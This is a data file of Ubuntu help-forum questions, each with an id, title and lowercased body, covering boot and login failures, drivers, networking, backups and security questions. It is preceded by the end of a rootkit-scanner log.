15:57:02 ] checking for root equivalent ( uid 0 ) accounts [ none found ] [ 15:57:02 ] info : found shadow file : /etc/shadow [ 15:57:02 ] checking for passwordless accounts [ none found ] [ 15:57:02 ] [ 15:57:02 ] info : starting test name 'passwd_changes ' [ 15:57:02 ] checking for passwd file changes [ none found ] [ 15:57:02 ] [ 15:57:02 ] info : starting test name 'group_changes ' [ 15:57:02 ] checking for group file changes [ none found ] [ 15:57:02 ] checking root account shell history files [ none found ] [ 15:57:02 ] [ 15:57:02 ] info : starting test name 'system_configs ' [ 15:57:02 ] performing system configuration file checks [ 15:57:03 ] checking for ssh configuration file [ not found ] [ 15:57:03 ] checking for running syslog daemon [ found ] [ 15:57:03 ] info : found rsyslog configuration file : /etc/rsyslog.conf [ 15:57:03 ] checking for syslog configuration file [ found ] [ 15:57:03 ] checking if syslog remote logging is allowed [ not allowed ] [ 15:57:03 ] [ 15:57:03 ] info : starting test name 'filesystem ' [ 15:57:03 ] performing filesystem checks [ 15:57:03 ] info : scan_mode_dev set to 'thorough ' [ 15:57:03 ] checking /dev for suspicious file types [ none found ] [ 15:57:03 ] checking for hidden files and directories [ warning ] [ 15:57:03 ] warning : hidden directory found : /etc/.java [ 15:57:03 ] warning : hidden directory found : /dev/.udev [ 15:57:03 ] warning : hidden file found : /dev/.initramfs : symbolic link to `/run/initramfs ' [ 15:57:08 ] [ 15:57:08 ] info : test 'apps ' disabled at users request . [ 15:57:08 ] [ 15:57:08 ] system checks summary [ 15:57:08 ] ===================== [ 15:57:08 ] [ 15:57:08 ] file properties checks ... [ 15:57:09 ] files checked : 135 [ 15:57:09 ] suspect files : 1 [ 15:57:09 ] [ 15:57:09 ] rootkit checks ... [ 15:57:09 ] rootkits checked : 242 [ 15:57:09 ] possible rootkits : 0 [ 15:57:09 ] [ 15:57:09 ] applications checks ... [ 15:57:09 ] all checks skipped [ 15:57:09 ] [ 15:57:09 ] the system checks took : 1 minute and 22 seconds [ 15:57:09 ] [ 15:57:09 ] info : end date is mon sep 30 15:57:09 edt 2013
352077	cause for not being able to login ?	before ubuntu 12.04 login screen i get this message and was wondering if this could be the cause for the login screen returning after entering my password and hitting enter : the disk drive for /dev/mapper/cryptswap1 is not ready yet or not present . when i login to my main user account it tries to load something , but then after a time just comes back to the login screen . i am not able to login with guest either , same kick back to the login screen after about 20 seconds . this is a clean install . when the login to guest window disappears , i get a black screen with the following message ( after some oks ) : 947.796019 ] nouveau e [ 1007 ] failed to idle channel 0xcccc0000 [ 1254.824019 ] `` '' '' '' '' `` [ 3136 ] `` `` `` `` `` '' '' '' '' '' '' '' [ 2417.180016 ] `` '' '' '' '' `` [ 4086 ] `` `` `` `` `` '' '' '' '' '' [ 2420.276016 ] `` '' '' '' `` [ 4361 ] `` `` `` `` `` '' '' '' '' '' [ 3007.796018 ] `` '' '' '' `` [ 6094 ] `` `` `` `` `` '' '' '' '' ''
352080	how can i find out if my installed os is a 32-bit or a 64-bit ?	i am a newbie so maybe my question is not so shiny . i wont to install something ( virtualbox ) but i have to chose between the 32-bit version and the 64-bit version according to my os . problem is that i do n't know/do n't remember what type of os it is from that point of view . so my question is the following : is there any fast and easy way ( for a beginner like me ) to find out what kind of os is using ? thank you !
352082	how do i disable screen blanking in ubuntu touch	i have a nexus 7 on my desk which i am using as a `` second '' screen as i work . it 's displaying useful data to me . as such i do n't want the screen to blank at all as it 's plugged into a charger and i want it to always be displaying something . how can i disable the screen blanking so my screen always stays on , until i press the power button to blank it manually ?
352086	how can i get a beltek 300 micro driver ?	i am running asutek computer p4c800-e motherboard and when i boot windows xo pro the belkin 300 works fine . when i boot ubuntu it can not find my wireless network . any help ?
352092	ca n't get full resolution on external display	i have read lots of reports of this issue but have n't found a solution yet . i have a sony vaio notebook running ubuntu 12.04 lts in 64-bits . it has an intel i5 processor and intel graphics controller . it is connected to a samsung 23 '' lcd display through an iogear kvm and the laptop also uses a sony docking station . connecting the display directly to the display does not change the behaviour . two other computers , one a second sony laptop using a docking station , the other a lenovo desktop , both running variants of windows , are also connected to the display via the same kvm . with both i have full resolution . as i indicated , i have read lots of reports on this issue , have tried the various suggested solutions , but still have 1024x763 resolution where i should have 1920x1080 . i should also point out that i have done a full update on the os .
352093	need to deactivate nvidia driver from recovery mode or using ubuntu 12.04 install disk	i tried switching graphics drivers from 317 to 304 ( post-release ) because it kept crashing when i wanted to move my monitor 's display to the other side of the laptop display ( using nvidia settings ) now ubuntu wo n't boot at all . it just crashes and leaves a blinking cursor but i ca n't type anything . i want to switch the graphics driver back to the old one using recovery mode or the ubuntu install disk so i can boot again . how can i do this ?
352094	what happens if i simply change a mount point from /usr/local to /usr ?	i have this disk set up like so : /dev/sda3 mounted to : /usr/local if i just change this ( in fstab , right ? ) to : /dev/sda3 mounted to : /usr what happens ? do i lose anything or does it all just default to the new mount point ?
352095	how can i delete all .lnk files on my ubuntu machine ?	for some reason , when i launch office 2010 using wine , it creates a lnk file in the recent directory of my windows profile . i just checked the folder and there were ~2000 lnk files . how would i delete all lnk files on system startup ?
352097	ca n't connect to wireless at school	i can connect to wireless at home and multiple other locations , but i currently can not connect to the wireless at my college . for the first three to four weeks i was connecting wonderfully , and then suddenly i could n't connect . i changed nothing . i finally got one of the college it people to look and he said that everything is still entered correctly as far as he knows , but he knows nothing about linux . if it helps , here are the instructions for connecting with windows and mac . they are what i used to connect the first few weeks : http : //wireless.mcckc.edu/ i have a wireless dongle i can use , but i 'd really rather not if i do n't have to . thanks !
352102	trying to install ubuntu alongside windows 8	whenever i try to install ubuntu alongside windows 8 , there is no option for it , it just says there is no os detected .
352103	connection mystery with ssh	i 've run into a problem with ssh that has me completely stumped ( and our department it guy as well ) : up until a few days ago i had no problems accessing my files on our departmental server ( university math department , running scientific linux ) using ssh from my ubuntu box at home , and i had no problems mounting my user directory at work as a network drive . as of a couple of days ago , running ssh user @ hostname.tld returns ssh_exchange_identification : connection closed by remote host running ssh -v hostname.tld returns openssh_6.1p1 debian-4 , openssl 1.0.1c 10 may 2012 debug1 : reading configuration data /etc/ssh/ssh_config debug1 : /etc/ssh/ssh_config line 19 : applying options for * debug1 : connecting to gorilla.math.uwo.ca [ 129.100.75.10 ] port 22. debug1 : connection established . debug1 : identity file /home/sean/.ssh/id_rsa type -1 debug1 : identity file /home/sean/.ssh/id_rsa-cert type -1 debug1 : identity file /home/sean/.ssh/id_dsa type -1 debug1 : identity file /home/sean/.ssh/id_dsa-cert type -1 debug1 : identity file /home/sean/.ssh/id_ecdsa type -1 debug1 : identity file /home/sean/.ssh/id_ecdsa-cert type -1 ssh_exchange_identification : connection closed by remote host and trying to mount the network folder gives oops ! something went wrong . unhandled error message : ssh program unexpectedly exited in fact i 'm not even able to successfully ping the server . my first thought was that either the server was down , or i had some sort of incorrect firewall setting ( although i had not made any changes to the firewall or router ) . it 's not a problem connecting via ssh through my router/firewall though , since i can connect to other servers via ssh ( i still have access to my account on the server at my last department ) , and the server i want to connect to is still up , since i can connect as follows : 1 . ssh into old server . 2 . from old server , ssh into new server . however , i ca n't log into the new server directly . i 'm completely stumped . any ideas ?
352106	enter password to unlock login keyring	i had forgotten my password for my user account so i pressed ctrl + alt + f2 and loged in as root and ran the following commands root password : passwd harley enter new unix password : reeter unix password : then rebooted and logged in then i got a pop-up saying : the password you used to log in with does not mach the password on your login keyring . what is it asking for : my root password , my old password ( that i forgot ) , or does it want my current password ? thanks .
352109	how to start vnc without interactive session ?	i have ubuntu 12.04 lts and will connect it with vnc . but after the system start , my vnc server did log me interactive in , after i open vnc connection i didnâ´t need to login on the ubuntu host . that is not what i will . my intention is to start vnc server without login - to the graphical login mask and log me then from here . the session should be the same as local on the host . what i have to do now ?
352114	~/.pam_environment is n't being set on reboot	i want to use postgresql plpython3u on ubuntu 12.04 . at first i run create extension plpython3u i has error , so i add python path to path sudo su - postgres stop service /etc/init.d/postgresql-9.3 export path=/opt/activepython-3.2/bin : $ path start service /etc/init.d/postgres-9.3 create extension plpython3u it work . but when i add .pam_environment to postgres user $ home ( opt/postgresql/9.3 ) , add line pythonhome=/opt/activepython-3.2/ pythonpath=/opt/activepython-3.2/bin : $ path ld_library_path=/opt/activepython-3.2/lib/ path=/opt/activepython-3.2/bin : $ path reboot ubuntu sudo su - postgres here is env command $ env mail=/var/mail/postgres user=postgres home=/opt/postgresql/9.3 xdg_session_cookie=321d497f10d151a0151ced5f00000002-1380596092.235379-1768086829 colorterm=gnome-terminal logname=postgres term=xterm path=/usr/local/bin : /usr/bin : /bin : /usr/local/games : /usr/games display=:0 lang=en_us.utf-8 xauthority=/home/tuan/.xauthority shell=/bin/sh pwd=/opt/postgresql/9.3 $ why my .pam_environment do n't work . please help . thanks in advance
352116	how do i select between ubuntu and kubuntu when i log in ?	i have ubuntu and have installed kubuntu desktop while on ubuntu . when i boot my computer my grub menu shows that i have kubuntu installed . when i click on kubuntu it boots to my ubuntu login and i log in and it boots ubuntu . how do i get kubuntu to be a real option to work when i boot ? am i supposed to be able to choose when i log in ? i asked a similar question to this earlier and have moved on to here please give any help you can ! ! ! thanks i wo n't downvote answers .
352121	bash auto_completion with xubuntu and xrdp from windows	i 'm using xubuntu and connecting over remotedesktop with windows 7 . everything works fine , but the auto_completion in my bash does n't work . i checked the .bashrc file in my home directory and also the /etc/bash.bashrc . i uncommend the lines below in my local bashrc configuration and also in bash.bashrc , but nothing changes . if ! shopt -oq posix ; then if [ -f /usr/share/bash-completion/bash_completion ] ; then . /usr/share/bash-completion/bash_completion elif [ -f /etc/bash_completion ] ; then . /etc/bash_completion fi fi
352124	sound system not working in ubuntu 12.04 sony vaio svf14212 laptop	when i play audio file in my ubuntu 12.04 vaio laptop , it 's audible in headset but no sound comes when i remove headsets.speakers not working . what do i do ?
352126	sharing ( virtual ) disk from virtualbox guest win7 to ubuntu host	i 've looked at other questions on this topic , but i have n't found anything that corresponds to my experience trying to actually do this . i want to smb mount my win7 virtualbox guest disk on my ubuntu host . in the vm ( that is , the windows 7 guest ) , i 've shared the folder , i think . i did that by going to the control panel , opening the 'share with - > advanced settings ' dialog , and making the disk shared . from the ubuntu host in nautilus or thunar , i can see the vm ( which calls itself `` vm7 '' ) . when i try to access the share from nautilus or thunar , i 'm presented with a username/password verification dialog . if i give the username and password that lets me use the windows guest , it does n't work ; the dialog just pops up again . this seems like something that should be pretty simple . what am i doing wrong ? edit oh also , from the windows ( guest ) side , the c : `` disk '' is shared with no password protection : `` people without a user account and password for this computer can access folders shared with everyone . ''
352128	ubuntu software center wo n't open to allow download of fonts	i need to download the times new roman font onto my libreoffice writer . when i go to follow the steps on the ubuntu software center , i click on the icon and it opens to a loading circle and then closes by itself and will not open . help !
352129	issues installing mysql server on ubuntu 13.04	i 'm currently trying to install a mysql server on my ubuntu 13.04 machine . the problem is , when i try to install it , i get error messages indicating that not all packages could be downloaded . when i run sudo apt-get install mysql-server , and after hanging for a while at reading headers , the console reads as follows : reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : libaio1 libdbd-mysql-perl libdbi-perl libhtml-template-perl libmysqlclient18 libnet-daemon-perl libplrpc-perl mysql-client-5.5 mysql-common mysql-server-5.5 mysql-server-core-5.5 suggested packages : libipc-sharedcache-perl tinyca mailx the following new packages will be installed : libaio1 libdbd-mysql-perl libdbi-perl libhtml-template-perl libmysqlclient18 libnet-daemon-perl libplrpc-perl mysql-client-5.5 mysql-common mysql-server mysql-server-5.5 mysql-server-core-5.5 0 upgraded , 12 newly installed , 0 to remove and 3 not upgraded . need to get 8,077 kb/24.5 mb of archives . after this operation , 84.9 mb of additional disk space will be used . do you want to continue [ y/n ] ? y err http : //us.archive.ubuntu.com/ubuntu/ raring-updates/main mysql-client-5.5 i386 5.5.32-0ubuntu0.13.04.1 connection failed [ ip : 91.189.91.13 80 ] err http : //security.ubuntu.com/ubuntu/ raring-security/main mysql-client-5.5 i386 5.5.32-0ubuntu0.13.04.1 connection failed [ ip : 91.189.92.190 80 ] failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/m/mysql-5.5/mysql-client-5.5_5.5.32-0ubuntu0.13.04.1_i386.deb connection failed [ ip : 91.189.92.190 80 ] e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ? i 've tried the suggested fix or running apt-get update and such , i 've made sure i have no connections blocked , i 've restarted , uninstalled , reinstalled , etc , all to no avail . i 've been searching the web all day for solutions i have n't yet tried , but most people with this issue are running an older version of ubuntu . ( by the way , i did try the solution here ) suggestions ?
352130	installing ubuntu with windows installer	if i use this method to install ubuntu on my windows 7 , will i lose windows 7 or will it dual boot with windows and ubuntu
352131	put swap on ssd or hdd ?	new installation coming up . 120gb ssd for os and home and 1tb hdd for storage . 16gb of ram which means 16gb of swap if i recall correctly . ssd space is too valuable for a swap partition right ? if my thinking is correct can someone guide me through or point me in the right direction for putting a swap partition on a second hard drive ? i have always selected the automatic settings when installing ubuntu . thanks !
352135	how to backup files from one ubuntu machine to a shared ntfs drive on another ubuntu machine	i 'm dual booting windows 7 and ubuntu 12.04 on my desktop machine which has a large ntfs hard drive i 'd like to use to backup files from 2 laptops . one runs only ubuntu 12.04 and the other only windows vista . i really only care about being able to backup my ubuntu laptop to the ntfs drive on the desktop over the network . i guess the tricky part is that it 's ntfs ( ca n't get rid of windows entirely yet ) . i 've been reading and reading and i 'm close . i 've installed samba , ntfs-config and ntfs-3g and i can access , read and write to the drive from my ubuntu laptop . this is why i ca n't understand why i get error messages like `` failed to mount windows share '' from programs like deja dup . i could easily copy my files to the ntfs drive directly but a proper backup tool obviously has major advantages ... i just ca n't get any of them to work . what samba settings are needed ? what ntfs-config settings are needed ? what deja dup settings are needed ? is n't the drive already mounted if i 'm able to access it from the laptop ?
352139	wine and ubuntu 13.04 - 64 bit	i have been trying to install wine on my 13.04 64 bit computer , and everytime it leads to synaptic asking for the uninstall of the entire system . i have been following some questions which suggest the addition of the wine repository ( also recomended on the winehq ) website , followed by sudo apt-get update and sudo apt-get install wine1.5 . the system cries , with the following messages : construction de l'arbre des dépendances lecture des informations d'état ... fait certains paquets ne peuvent être installés . ceci peut signifier que vous avez demandé l'impossible , ou bien , si vous utilisez la distribution unstable , que certains paquets n'ont pas encore été créés ou ne sont pas sortis d'incoming . l'information suivante devrait vous aider à résoudre la situation : les paquets suivants contiennent des dépendances non satisfaites : wine : dépend : wine1.6 mais ne sera pas installé ou wine1.7 mais ne sera pas installé e : impossible de corriger les problèmes , des paquets défectueux sont en mode « garder en l'état » . english translation : building dependency tree reading state information ... done some packages could not be installed . this can mean you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet created or are not moved out of incoming . the following information should help you to resolve the situation : the following packages have unmet dependencies : wine : depends : wine1.6 but will not be installed or wine1.7 but will not install e : unable to correct problems , faulty packets mode `` keep state '' . i have tried all sudo apt-get autoclean and sudo apt-get autoremove and sudo apt-get update . however , the problem seems to continue . any clues ?
352140	get the list of all root dependent devices	how do i get the list of all devices which are root dependent i.e either mounted on root filesystem or created from root devices ( logical volume on the top of physical volume which is root device ) . edit answer must be an script ( may be shell ) that will return list of all the root dependent devices.i dont wan na use any lvm specific package command ( such as lvdisplay etc ) . 23-oct-2013 as answer posted by @ oli , mount | awk ' $ 3 == `` / '' { printf $ 1 } ' | sed s'/. $ //' only lists the device.but i want which of its partition is actually a root dependent . i tried getting which lvm device is mapped to physical device using dmsetup deps i got ubuntu-swap_1 : 1 dependencies : ( 8 , 5 ) ubuntu-root : 1 dependencies : ( 8 , 5 ) above gives me mapping ( can get by comparing ( major , minor ) number ) but how can i ensure lvm is root device ?
352143	blending ubuntu folder and android kernel to create image for arm	does ubuntu modify the linux kernel 's apis ? is it possible to use the kernel from android as it is and copy the ubuntu folder developed for the ver 3.4.0 and create an ubuntu image for the arm processor ?
352146	software for aiding in printing photos	i wanted to know if there is any software to print photos , which can frame the photo and also change the size of it . i have two printers canon and while i found the drivers and work , ubuntu 12.04 will not let me install the printer cd . unable to install this sw , not only i can not print photos as i want , but i can not run a head cleaning , aligning , or know that i have ink level . i hope you can help me and all the sw probe recommended software center , but they are very basic and none worked as i expected .
352147	program to sync my ipod ?	is there a program to sync my ipod touch 4g and my ipod nano ? i tried using clementine but it wo n't work ! my ipod touch has ios 6.1.3 . p.s . i already used rhythmbox did n't work either .
352149	amd fglrx driver crashes window manager	i have a lenovo ideapad y470 . every time that i install the fglrx driver through system settings - > software sources - > additional drivers , my window manager completely crashes after rebooting , and i receive a blank desktop . i can open a terminal window and load up applications if i want to , but no window manager . if i switch to gnome , i can also get around . i have also found that i have the exact same problem if i switch to linux mint and try to use cinnamon , so i know that the problem is not unity . is there some way that i can get these proprietary drivers working ? thanks naveen , i tried a fresh install , first ran updates and installed linux-headers-generic , and then ran that driver update . after rebooting , i received an error about xorg not being configured , and it asked me if i wanted to restore the default configuration , which i did . now , after reboot i just boot to the ubuntu graphical login prompt followed by black screen . not sure what to do from here ...
352150	will i be able to install ubuntu touch on a generic android phone in future ?	i have this unbranded android phone with 1ghz cpu and 512mb or ram which is the entry level hardware for ubuntu touch . ( this is made in india and it runs android 4 smoothly . i ca n't even find it 's stock rom in the internet and a way to root the device . this is the model : intex aqua superb ) i 'm not going to be very specific here , because existing android phones have a huge diversity . my question is , will there be way to install ubuntu touch on such devices ? something like a generic installer , or a way to compile from source and to do it manually ? is canonical interested in bringing utouch to these kind of low-end phones ? thanks in advance !
352152	no laptop backlight when using amd driver recommended by steam	when i install the fglrx-experimental-13 driver that steam recommends for my laptop ( ati mobility radeon hd 5000 series ) i have no backlight when i log in , but an external monitor works . i 've tried a lot of backlight fixes suggested on the internet , but none of them seem to work . i have also tried various other drivers including the drivers from the official amd website , but both the beta and the stable drivers produce this error . booting with acpi_backlight=vendor flag ( or various other flags for that matter ) does n't work either . pressing the hardware keys to change the backlight also does n't work . any ideas how to solve this issue ?
352154	lan not working on dell 3360	i have a dell vostro 3360 and i have recently removed windows and installed ubuntu 12.04 i am able to use wifi and bluetooth but it does not detect when any lan cable is connected . i tried unblocking everything using sudo rfkill unblock all but to no avail . please help asap as i am a college student and i need lan connectivity
352156	can chmod 777 be a security risk on a personal machine ?	can 777 permissions increase security risk on an average ubuntu single-user machine ? how ? what are other downsides of it ? thanks
352157	how to use a sqlite database from qml ?	i have not been able to find a working example in qt creator or gallery to use sqlite offline storage api for an ubuntu touch application .
352159	any real-time antivirus for ubuntu ?	is there any real-time anti virus for ubuntu ? which antivirus is good and in real-time ( i mean that , if i try to open an infected file or go to a bad website , it stops it ) . i read a post in ubuntuguide and here is a part of it : anti-virus if you are running a file server , interface frequently with windows drives or share files with windows users , or use virtualization , you will want a virus checker for your windows files . despite extensive misinformation , linux is not immune from malware ( witness the explosion of malware being created for the linux-based google android systems ) . the malware is not usually spread within the os itself ( as long as the os is a well-respected distribution obtained through official channels ) , but in trojan programs downloaded and installed by users outside of the normal software distribution channels ( i.e . repositories ) of the os . there is always a danger to using programs downloaded from the internet from sources other than respected repositories -- it is the primary reason that debian and ( k ) ubuntu retain tight control over their software repositories . any file can have malware embedded in it ( which is trivial to achieve by concatenation , for example : cat originalfile.avi malware.exe > originalfileplusmalware.avi ) . the question is whether a user will try to open a file with a program ( such as a media player ) that has been compromised in a way that allows it to execute the code found in the infected media ( e.g . .avi ) file . this can occur not only for windows users but for any os ( including mac osx and linux ) with a compromised program ( e.g . media player ) . an example is the extensive problems the mac os community is currently having with the flash player . routine scanning of any file downloaded from the internet , any file imported from another user 's computer ( even a trusted source , since their attention to virus prevention may not be as compulsive as yours ) , or any attachment received in an email ( even from a trusted sender ) should be done with an anti-virus program . so i think that there is a need for anti-virus in ubuntu .
352166	problem in call through modem	i did install huawei mobile partner 21 for my huawei dongle , in my ubuntu 13.04 amd64 os . but the problem is when i trying to get calls through it , it connects with the remote phone , but no sounds . i can not hear the other and vice versa . dialing tone works but no ringing tone . where or how should i do changes to correct the problem . ?
352167	is it possible to backup an ubuntu computer ( ext4 ) to a windows pc ( ntfs ) ?	i 've a clonezilla boot disk and i have n't tried samba options there yet ( i might mess it up ! ) . will i need a static ip to be set on the windows pc , should be there be shared folder or something of the sort ? also besides clonezilla , are there any other alternatives available ( within ubuntu perhaps )
352169	ubuntu 13.04 and amd phenom 2 x6 1100	i install ubuntu 13.04 on my desktop and everything is very well in the installation process after installation ubuntu starts very fast but when i login ubuntu freeze after 10 seconds and i cant use it and i have to reset the system with reset botton . i have the same problem with ubuntu 12.04 but i dont have any problem with 11.01 please help ... i hate microsoft windows and i want to use ubuntu
352170	extracting a tar ball fails with `` can not open : not a directory ''	i am trying to extract an tarball , i keep getting this error tar : mediatek/custom/common/lk/lcm/bp101wx1_n/bp101wx1_n.c : can not open : not a directory tar : mediatek/custom/common/lk/lcm/hsd070idw1/hsd070idw1.c : can not open : not a directory tar : mediatek/custom/common/lk/lcm/nt35582/nt35582.c : can not open : not a directory tar : mediatek/custom/common/lk/lcm/r63311_fhd_dsi_vdo_sharp/r63311_fhd_dsi_vdo_sharp.c : can not open : not a directory tar : mediatek/custom/common/lk/lcm/otm9608_wvga_dsi_cmd/otm9608_wvga_dsi_cmd.c : can not open : not a directory tar : mediatek/custom/common/lk/lcm/lg4571/lg4571.c : can not open : not a directory tar : mediatek/custom/common/lk/lcm/hx8363b_wvga_dsi_cmd/hx8363b_wvga_dsi_cmd.c : can not open : not a directory tar : mediatek/custom/common/lk/lcm/lg4573b_wvga_dsi_vdo_lh430mv1/lg4573b_wvga_dsi_vdo_lh430mv1.c : can not open : not a directory tar : exiting with failure status due to previous errors the original file was a .zip file that contained a .tar.gz file , so i first used unzip then i used pigz with the -d option to create the tar file . i extracted the tar file using tar with xf option . extracting the tar.gz using the tar xzf also does n't work : / using 7za i get can not open output file mediatek/custom/common/lk/lcm/bm8578/bm8578.c can not open output file mediatek/custom/common/lk/lcm/nt35565_qhd_dsi_cmd/nt35565_qhd_dsi_cmd.c can not open output file mediatek/custom/common/lk/lcm/spfd5461a/spfd5461a.c can not open output file mediatek/custom/common/lk/lcm/bp101wx1_n/bp101wx1_n.c can not open output file mediatek/custom/common/lk/lcm/hsd070idw1/hsd070idw1.c can not open output file mediatek/custom/common/lk/lcm/nt35582/nt35582.c can not open output file mediatek/custom/common/lk/lcm/r63311_fhd_dsi_vdo_sharp/r63311_fhd_dsi_vdo_sharp.c can not open output file mediatek/custom/common/lk/lcm/otm9608_wvga_dsi_cmd/otm9608_wvga_dsi_cmd.c can not open output file mediatek/custom/common/lk/lcm/lg4571/lg4571.c can not open output file mediatek/custom/common/lk/lcm/hx8363b_wvga_dsi_cmd/hx8363b_wvga_dsi_cmd.c can not open output file mediatek/custom/common/lk/lcm/lg4573b_wvga_dsi_vdo_lh430mv1/lg4573b_wvga_dsi_vdo_lh430mv1.c sub items errors : 3869 the tar file is 3.8 gb if that matters
352173	what is apache handlers equivalent in lighttpd	hi experts can somebody give some clues about this . in httpd.conf we use user defined handlers like addhandler ctc-handler getlauncher what is the equivalent of userdefined apache handlers in lighttpd .
352174	i ca n't access the system : error : `` unknown filesystem . grub rescue ''	i 'm a fresh ubuntu user and i 've installed a double boot with wind 8 and ubuntu 13.04 , but since yesterday i 'm receiving an error showing : error : unknown filesystem grub rescue > the fact is when i do ls ( hdx , gpty ) / all i get is `` error : unknown filesystem '' again . and the solutions posted do n't work because i do n't know why but i ca n't access the bios pressin f2 or to the boot pressing f12 , the simply do n't work since the error .
352175	dual monitor wont play media centre on primary screen	i am running ubuntu 13.04 on a laptop that is connected to my tv . everything seems to work fine but when i open my media centre ( xbmc ) it will only run in full screen on the laptop . i have changed the display settings to a dual screen set up with the tv as the launcher screen but the only way i can get xbmc on the tv is to run it in a window and drag it over to the tv . can anyone help me ? should i have version 12.04 instead ?
352177	please help identify on which partition i have ubuntu installed	i need to reinstall my grub since i can not boot windows 8 anymore ( something happened with my installation of ubuntu ) . i want to follow this advice - boot error > no such device : grub rescue in order to re-install the grub but i made the stupid mistake of allocating half of the size of the partition to windows and half to ubuntu lol . so now i need to know on which partition i have linux could someone help me out ? thanks . here is the partition list device boot start end blocks id system /dev/sda1 * 2048 718847 358400 7 hpfs/ntfs/exfat /dev/sda2 718848 1025779711 512530432 7 hpfs/ntfs/exfat /dev/sda3 1025779712 1851121663 412670976 7 hpfs/ntfs/exfat /dev/sda4 1851121664 1953521663 51200000 f w95 ext 'd ( lba ) /dev/sda5 1851123712 1953521663 51198976 7 hpfs/ntfs/exfat sorry , i had a crash here is another list i get : device boot start end blocks id system /dev/sdb1 2048 923381759 461689856 7 hpfs/ntfs/exfat /dev/sdb2 923381760 1438451711 257534976 7 hpfs/ntfs/exfat /dev/sdb3 1438453758 1953523711 257534977 5 extended partition 3 does not start on physical sector boundary . /dev/sdb5 1920051200 1953523711 16736256 82 linux swap / solaris /dev/sdb6 1886576640 1920040959 16732160 82 linux swap / solaris /dev/sdb7 1853102080 1886560255 16729088 82 linux swap / solaris /dev/sdb8 1438453760 1819625471 190585856 83 linux /dev/sdb9 1819627520 1853097983 16735232 82 linux swap / solaris i want to boot into windows actually
352178	is there a way to run a script on gimp startup ?	now that i know how to play with python fu , there are certain things i want gimp to do when started , in there a way to do this via python script ?
352184	trouble shooting issues	so i got the parallels - ubuntu combo . i downloaded the updates than eclipse c/c++ package and when i tried to use the program it didnt work . so i figured i would restart parallels and see if it would work , however it is now stuck in a starting screen where terminal is only open but not responsive and and it just does not start any more . what could this issue be ? i have attached a screen shot of what it looks like .
352188	can no longer connect to pptp vpn on 13.04	i recently upgrade my 12.04 desktop installation to 12.10 and then to 13.04 hoping that my problems with vpn would disappear . i ca n't put my finger on when , but in 12.04 , i just started noticing that the pptp service was crashing every 2-5 minutes , making vpn essentially unusable . finding nothing satisfying in the forums , i decided to be a little more bold and upgrade - both to check out the new version and hopefully have vpn automatically be repaired . by the way , it 's been working great until just recently on 12.04 and it does n't work at all now . so , it 's completely and inexplicably broken on 13.04 . it seems that the pppd daemon is just gone . hunting down how to reinstall it did n't yield much of anything . there were launchpad bugs reported related to this but no resolution . here 's my syslog when i try to connect . as you can see , it does n't even start now : oct 1 15:07:20 shuttle networkmanager [ 1011 ] : < info > starting vpn service 'pptp ' ... oct 1 15:07:20 shuttle networkmanager [ 1011 ] : < info > vpn service 'pptp ' started ( org.freedesktop.networkmanager.pptp ) , pid 6436 oct 1 15:07:20 shuttle networkmanager [ 1011 ] : < info > vpn service 'pptp ' appeared ; activating connections oct 1 15:07:20 shuttle networkmanager [ 1011 ] : < info > vpn plugin state changed : init ( 1 ) oct 1 15:07:20 shuttle networkmanager [ 1011 ] : < info > vpn plugin state changed : starting ( 3 ) oct 1 15:07:20 shuttle networkmanager [ 1011 ] : < info > vpn connection 'strong pptp ' ( connect ) reply received . oct 1 15:07:20 shuttle networkmanager [ 1011 ] : < warn > vpn connection 'strong pptp ' failed to connect : 'could not find the pppd binary. ' . oct 1 15:07:20 shuttle networkmanager [ 1011 ] : < info > policy set 'the 'net ' ( eth0 ) as default for ipv4 routing and dns . oct 1 15:07:20 shuttle networkmanager [ 1011 ] : < warn > error disconnecting vpn : could not process the request because no vpn connection was active . oct 1 15:07:26 shuttle networkmanager [ 1011 ] : < info > vpn service 'pptp ' disappeared i 'll do what it takes to get this working , but this seems so fundamental to the os . any ideas ? why would this be so hard to repair ?
352189	ubuntu 12.04 lts graphic problem	i 'm using ubuntu 12.04 lts , i installed compiz and after some day i uninstalled it but after unistalling something bad has happened my graphic now is something like this : what can i do to make it like before ? thanks in advance ,
352190	does cve-2012-0883 apply to ubuntu ?	does the apache vulnerability cve-2012-0883 affect ubuntu ? have tried searching for it at ubuntu.com but with no hits . i note that ubuntu releases an ubuntu security notice ( usn ) when it issues an update for the vulnerability e.g . usn-1627-1 for cve-2012-2687 and cve-2012-4929 . however i can not find any corresponding usn for cve-2012-0883 although i did find this : http : //people.canonical.com/~ubuntu-security/cve/2012/cve-2012-0883.html and if ubuntu is not affected by the vulnerability , what version of apache contains the fix ?
352192	display problem `` cable not connected ''	i 'm installing ubuntu 13.04 from usb bootable pendrive..after i select install ubuntu the screen goes blank for sometimes and after that i says `` cable not connected '' . but the welcome sound triggers in my speakers . i have amd fx 8350 processor nvidia gt 630 synergy edition
352198	reading all files from a directory	following code is to read all files in download directory , but when i execute this code it wo n't print ( display ) , what is wrong with this code.. ? import glob path = '/home/kumarswamys/adobe/download/*.html ' files=glob.glob ( path ) for file in files : f=open ( file , 'r ' ) f.readlines ( ) f.close ( )
352205	add command to lauch a new application from terminal	i 've installed bluegriffon on ubuntu 13.04 x64bit . i 've add it to unity launcher by creating a `` bluegriffon.desktop '' file . now i want to launch bluegriffon directly from terminal ; assuming that the prgram folder is on the path /home/username/programs/bluegriffon and assuming that the laucher 's file name is bluegriffon , which code i have to add to .bashrc and .profile ? note : i tried to add path to .profile , but it does n't work .
352206	array declaration	how can i declare an array in ubuntu ? i have tried the code below unix= ( 'zero ' 'one ' 'two ' ) # echo -n `` area2 [ 0 ] = `` echo $ { area2 [ @ ] } # aha , zero-based indexing ( first element of array is [ 0 ] , not [ 1 ] ) . # echo -n `` area2 [ 1 ] = `` # echo $ { area2 [ 1 ] } this does not work in ubuntu .
